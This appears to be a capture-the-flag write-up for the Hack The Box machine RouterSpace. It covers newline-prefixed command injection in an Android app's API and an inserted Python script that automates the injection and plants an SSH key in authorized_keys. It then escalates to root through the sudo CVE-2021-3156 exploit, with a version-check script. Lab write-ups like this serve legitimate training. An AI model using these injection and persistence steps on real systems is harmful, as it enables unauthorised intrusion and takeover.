🗼Router Space

Link: https://app.hackthebox.com/machines/444
Setting-up the Environment
For this machine we will need an Android emulator and Burp Suite or OWASP ZAP proxying that emulator's traffic. I will be solving this lab on my Windows machine.
Android Emulator - There are several options: Anbox, the Android Studio emulator, Genymotion, a physical Android phone, or skipping the emulator altogether by decompiling the APK and reversing its .js files. I will be using Genymotion for this lab. Download and install Genymotion, then add a virtual device running Android 6.0 or above (Android 8.0 is a good choice). Once that is done, proceed to the next step.
Setting up the Proxy - We need to intercept the app's traffic, so we route Genymotion through Burp. Follow https://support.genymotion.com/hc/en-us/articles/360012333077-How-to-use-Burp-suite-with-Genymotion-Desktop-. Once the proxy is configured, let's start.
Reconnaissance
Let's start with an Nmap scan: nmap -sS -A -sC -sV -p- -T4 -oN scan.txt $ip (-A already implies -sC and -sV, so listing them is harmless)
Two ports are open: 22 (SSH) and 80 (HTTP).
Let's visit the HTTP server on port 80.
Port 80
Opening it in a browser shows this static page:

No button other than "Download" did anything; it downloads routerspace.apk.
Nothing of interest was found in the page source.
Let's test the routerspace.apk we got.
routerspace.apk
Install the APK in Genymotion; the app looks like this:

It has a single button, which appears to check whether our router is reachable.
Let's fire up Burp and intercept the request that button sends (Burp must be configured as described in Setting-up the Environment above).

Before sending it to Repeater, add routerspace.htb to the hosts file of the machine running Burp, so that Burp can resolve the hostname the app uses to the target IP and actually get a response.
Windows - edit c:\windows\system32\drivers\etc\hosts in Notepad run as administrator
Linux - sudo nano /etc/hosts
Add the line <machine IP> routerspace.htb, replacing <machine IP> with your target's IP.

Now send the request to Burp's Repeater (Ctrl+R) and check the response.

Let's modify the string and check the response.

The server reflects the same string back with a trailing \n.
Let's try some basic command injection payloads.

The response was the same: it echoed back exactly the string we provided.
Unchanged reflection like this usually means the input does reach a command but a filter is neutralising the usual separators, not that the parameter is harmless. Let's try to get past the filter.

Just add \n before the command (typed literally as the two characters \n inside the JSON string; the server decodes it to a real newline, so the shell reads our command as a separate line).
Boom! We bypassed the filter and the command executed; its output shows it ran as the user paul.
User Flag
We have command execution, so let's get the user flag.
Locating the user flag

Now cat that user.txt:

Halfway done! Let's get a reverse shell so we can work toward the root flag.
Reverse Shell
I tried multiple payloads but could not get a reverse shell.
Let's check paul's .ssh directory.

It was empty, so we can generate our own key pair and write the public key into .ssh/authorized_keys through the command injection.
Back on our host machine, open a terminal (or PowerShell on Windows).
Run ssh-keygen to generate the key pair:

Copy the whole content of id_rsa.pub and write it into .ssh/authorized_keys on paul's machine through the injection:

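The two steps above (probing the status check with a newline-prefixed command, then planting our public key) can be scripted instead of pasted into Repeater. The following is an added example and not the writeup's own code: the endpoint path, the JSON field name, the baseline value and paul's home directory are assumptions, so take the real ones from the request Burp intercepted. It applies the same oracle as the writeup, a response that merely echoes the input means the filter held, and builds the authorized_keys one-liner with the permissions sshd insists on.

```python
"""Added example (not from the original writeup): drive the RouterSpace status
check from a script. Builds the newline-prefixed payload, applies the
echo-vs-output oracle, and produces the command that plants an SSH key."""
import json
import urllib.request

TARGET = "http://routerspace.htb"   # resolved through the hosts entry above
ENDPOINT = "/api/check"             # ASSUMPTION: copy the real path from Burp
FIELD = "ip"                        # ASSUMPTION: the JSON key the app sends
BASELINE = "0.0.0.0"                # ASSUMPTION: the value the app sends itself


def build_payload(command, prefix="\n"):
    """JSON body with the command appended to the baseline value.

    json.dumps turns the real newline into the two characters \\n, which is
    exactly what gets typed into the Repeater body; the server decodes it back
    to a newline, so the shell sees the command on its own line.
    """
    return json.dumps({FIELD: BASELINE + prefix + command})


def send(body, url=TARGET + ENDPOINT, timeout=10):
    """POST the body to the API and return the raw response text.
    Needs the target to be reachable; tests swap this for a stub sender."""
    req = urllib.request.Request(
        url, data=body.encode(), method="POST",
        headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode()


def injected_output(sent_value, response_text):
    """The writeup's oracle: a response that only reflects what we sent means
    the filter held; anything else is command output.
    Returns the output string, or None for a plain echo."""
    try:
        data = json.loads(response_text)
    except json.JSONDecodeError:
        data = response_text
    if isinstance(data, dict):
        data = data.get(FIELD, response_text)
    if isinstance(data, str) and data.strip() == sent_value.strip():
        return None
    return data if isinstance(data, str) else response_text


def probe(command, prefix="\n", sender=send):
    """Send one injected command and return its output (None if filtered)."""
    body = build_payload(command, prefix)
    return injected_output(json.loads(body)[FIELD], sender(body))


def authorized_keys_command(pubkey, home="/home/paul"):
    """One-liner to run through the injection so our key logs in as paul.
    home is an ASSUMPTION. Permissions matter: sshd ignores an authorized_keys
    file that is group/world writable or lives in a world-writable ~/.ssh."""
    return (f"mkdir -p {home}/.ssh && chmod 700 {home}/.ssh && "
            f"echo '{pubkey}' >> {home}/.ssh/authorized_keys && "
            f"chmod 600 {home}/.ssh/authorized_keys")


if __name__ == "__main__":
    # Against the live box: confirm execution first, then plant the key.
    print(probe("id"))
    with open("id_rsa.pub") as fh:
        print(probe(authorized_keys_command(fh.read().strip())))
```

Run it from the directory holding id_rsa.pub once the hosts entry is in place; if probe("id") prints None the filter is still winning and the prefix or endpoint needs adjusting before the key is sent.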
Once that is done, let's connect as paul via SSH.
Windows - use PuTTY, or from PowerShell:
ssh -i .\id_rsa paul@ip
Linux - the private key must not be readable by others or ssh refuses to use it:
chmod 600 id_rsa
ssh -i id_rsa paul@ip

We are in as paul. Now let's escalate to root
Privilege Escalation
I prefer manual enumeration first for any privilege escalation.
The very first check turned up a vulnerable sudo: sudo --version reports 1.8.31.

This version is vulnerable to CVE-2021-3156 (Baron Samedit), a heap overflow in sudo's handling of the arguments to sudoedit -s that any local user can abuse to get root.
Alternatively, copy linpeas.sh over with scp, then chmod +x linpeas.sh and run ./linpeas.sh on paul's machine; it flags the same sudo version.
Now we can use a public exploit for this CVE to spawn a root shell.
Download exploit.py to our machine and copy it to paul's machine via scp.
With the exploit on the box, run it with python3:
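Before uploading an exploit it is worth confirming the box really is in the affected range rather than trusting a version string alone. The script below is an added example, not part of the writeup: it encodes the CVE-2021-3156 affected ranges (1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1; fixed in 1.8.32 and 1.9.5p2), parses the version out of sudo --version, and, when the version matches, runs the behavioural probe published with the bug (sudoedit -s / answers "not a regular file" when vulnerable and a usage message when patched).

```shell
#!/bin/sh
# Added example (not from the original writeup): is this sudo in the
# CVE-2021-3156 affected ranges?  Affected: 1.8.2 - 1.8.31p2 and 1.9.0 - 1.9.5p1.

# Turn "1.8.31p2" into one comparable integer:
# major*1000000 + minor*10000 + patch*100 + p-level
version_key() {
  ver="$1"
  maj=${ver%%.*}
  rest=${ver#*.}
  min=${rest%%.*}
  rest=${rest#*.}
  case "$rest" in
    *p*) pat=${rest%%p*}; plev=${rest#*p} ;;
    *)   pat=$rest;       plev=0 ;;
  esac
  echo $(( maj * 1000000 + min * 10000 + pat * 100 + plev ))
}

# Returns 0 (true) when the version is inside an affected range.
sudo_vuln_version() {
  key=$(version_key "$1")
  if [ "$key" -ge "$(version_key 1.8.2)" ] && [ "$key" -le "$(version_key 1.8.31p2)" ]; then
    return 0
  fi
  if [ "$key" -ge "$(version_key 1.9.0)" ] && [ "$key" -le "$(version_key 1.9.5p1)" ]; then
    return 0
  fi
  return 1
}

# Pull the version number out of `sudo --version` output read on stdin;
# the first line looks like "Sudo version 1.8.31".
parse_sudo_version() {
  sed -n 's/^Sudo version \([0-9][0-9.p]*\).*/\1/p' | head -n 1
}

# Live check on the box: version range, then the sudoedit probe.
check_box() {
  ver=$(sudo --version 2>/dev/null | parse_sudo_version)
  if [ -z "$ver" ]; then
    echo "sudo not found"
    return 2
  fi
  if sudo_vuln_version "$ver"; then
    echo "sudo $ver: inside the CVE-2021-3156 affected range"
    if sudoedit -s / 2>&1 | grep -q 'not a regular file'; then
      echo "sudoedit probe: vulnerable"
    else
      echo "sudoedit probe: patched (usage message), do not bother with the exploit"
    fi
    return 0
  fi
  echo "sudo $ver: not affected"
  return 1
}

# Run the live check only when asked, so the functions can also be sourced.
if [ "${1:-}" = "--check" ]; then
  check_box
fi
```

On paul's shell: sh sudo_check.sh --check. A version inside the range but a usage message from sudoedit -s / means the distro backported the fix, which happens on long-lived releases and is exactly the case a version-only check gets wrong.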

and BOOM! we are root.
Let's get our root flag.

Pwned!
Thanks for reading. Hope you have enjoyed and learned something. For any questions feel free to ping me on Twitter or LinkedIn